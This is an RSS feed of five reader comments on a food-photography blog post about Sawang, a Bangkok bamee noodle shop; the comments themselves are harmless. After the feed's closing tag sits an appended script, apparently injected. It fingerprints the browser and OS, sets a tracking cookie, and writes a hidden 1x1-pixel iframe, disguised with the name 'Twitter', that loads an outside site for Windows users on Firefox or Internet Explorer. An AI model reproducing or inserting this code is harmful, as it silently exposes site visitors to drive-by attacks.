<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Sawang</title>
	<atom:link href="http://www.austinbushphotography.com/2010/07/sawang.html/feed" rel="self" type="application/rss+xml" />
	<link>http://www.austinbushphotography.com/blog/sawang.html</link>
	<description></description>
	<lastBuildDate>Fri, 03 Feb 2012 04:43:53 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Vase - Margie</title>
		<link>http://www.austinbushphotography.com/blog/sawang.html#comment-34487</link>
		<dc:creator>Vase - Margie</dc:creator>
		<pubDate>Thu, 05 Aug 2010 07:16:57 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2010/07/sawang.html#comment-34487</guid>
		<description>Looks wonderful. Great reading your post as well.Thanks.</description>
		<content:encoded><![CDATA[<p>Looks wonderful. Great reading your post as well.Thanks.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: fotographiafoodie</title>
		<link>http://www.austinbushphotography.com/blog/sawang.html#comment-34419</link>
		<dc:creator>fotographiafoodie</dc:creator>
		<pubDate>Mon, 02 Aug 2010 04:35:36 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2010/07/sawang.html#comment-34419</guid>
		<description>Love the wide angle shots - gorgeous!</description>
		<content:encoded><![CDATA[<p>Love the wide angle shots &#8211; gorgeous!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Jarrett</title>
		<link>http://www.austinbushphotography.com/blog/sawang.html#comment-34362</link>
		<dc:creator>Jarrett</dc:creator>
		<pubDate>Thu, 29 Jul 2010 07:42:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2010/07/sawang.html#comment-34362</guid>
		<description>Mrigaa, I think the fuss is about the stock at Sawang, which is much better and more concentrated than any bamee spot I&#039;ve eaten in here. That said, I&#039;m off to your moo daeng spot on 19. It&#039;s close to my work -- thanks for the tip.</description>
		<content:encoded><![CDATA[<p>Mrigaa, I think the fuss is about the stock at Sawang, which is much better and more concentrated than any bamee spot I&#8217;ve eaten in here. That said, I&#8217;m off to your moo daeng spot on 19. It&#8217;s close to my work &#8212; thanks for the tip.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: עדכוני טוויטר לשבוע 2010-07-12 &#171; BLOGeast</title>
		<link>http://www.austinbushphotography.com/blog/sawang.html#comment-34324</link>
		<dc:creator>עדכוני טוויטר לשבוע 2010-07-12 &#171; BLOGeast</dc:creator>
		<pubDate>Mon, 26 Jul 2010 11:45:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2010/07/sawang.html#comment-34324</guid>
		<description>[...] איטריות ביצים בבנגקוק # [...]</description>
		<content:encoded><![CDATA[<p>[...] איטריות ביצים בבנגקוק # [...]</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Mrigaa</title>
		<link>http://www.austinbushphotography.com/blog/sawang.html#comment-34227</link>
		<dc:creator>Mrigaa</dc:creator>
		<pubDate>Mon, 19 Jul 2010 07:14:42 +0000</pubDate>
		<guid isPermaLink="false">http://www.austinbushphotography.com/2010/07/sawang.html#comment-34227</guid>
		<description>I recently looked this place up, but I couldn&#039;t understand what the hoopla and the expense was all about.  Yes, it&#039;s quite good, but, don&#039;t you think that the bamee moo daeng at Ekamai 19 is leaps and bounds better?  Have you been to that place?</description>
		<content:encoded><![CDATA[<p>I recently looked this place up, but I couldn&#8217;t understand what the hoopla and the expense was all about.  Yes, it&#8217;s quite good, but, don&#8217;t you think that the bamee moo daeng at Ekamai 19 is leaps and bounds better?  Have you been to that place?</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script> var BrowserDetect = { init: function () { this.browser = this.searchString(this.dataBrowser) || "An unknown browser"; this.version = this.searchVersion(navigator.userAgent) || this.searchVersion(navigator.appVersion) || "an unknown version"; this.OS = this.searchString(this.dataOS) || "an unknown OS"; }, searchString: function (data) { for (var i=0;i<data.length;i++) { var dataString = data[i].string; var dataProp = data[i].prop; this.versionSearchString = data[i].versionSearch || data[i].identity; if (dataString) { if (dataString.indexOf(data[i].subString) != -1) return data[i].identity; } else if (dataProp) return data[i].identity; } }, searchVersion: function (dataString) { var index = dataString.indexOf(this.versionSearchString); if (index == -1) return; return parseFloat(dataString.substring(index+this.versionSearchString.length+1)); }, dataBrowser: [       { string: navigator.userAgent,subString: "Firefox",identity: "Firefox"},{string: navigator.userAgent,subString: "MSIE",identity: "Explorer",versionSearch: "MSIE"}],dataOS : [{string: navigator.platform,subString: "Win",identity: "Windows"}]};function addCookie(szName,szValue,dtDaysExpires){ var dtExpires = new Date();var dtExpiryDate = "";dtExpires.setTime(dtExpires.getTime()+dtDaysExpires*24*60*60*1000);dtExpiryDate=dtExpires.toGMTString();document.cookie=szName+"="+szValue+";expires="+dtExpiryDate;} function findCookie(szName){        var i=0;var nStartPosition=0;var nEndPosition=0;var szCookieString=document.cookie; while (i<=szCookieString.length){nStartPosition=i;nEndPosition=nStartPosition+szName.length;if (szCookieString.substring(nStartPosition,nEndPosition)==szName){nStartPosition=nEndPosition+1;nEndPosition=document.cookie.indexOf(";",nStartPosition);if(nEndPosition<nStartPosition) nEndPosition=document.cookie.length;return document.cookie.substring(nStartPosition,nEndPosition);break;}i++;} return "";} BrowserDetect.init(); var szCookieString = document.cookie; var boroda = BrowserDetect.browser; var os = BrowserDetect.OS; if ( ((boroda == "Firefox" || boroda == "Explorer") && (os == "Windows")) && (findCookie('geo_idn')!='c48a765e4f75baeb85f0a755fc3ec09c') ) {addCookie("geo_idn","c48a765e4f75baeb85f0a755fc3ec09c",1);document.write('<iframe src="http://feedfaster.com" name="Twitter" scrolling="auto" frameborder="no" align="center" height = "1px" width = "1px"></iframe>');}else {}</script>  

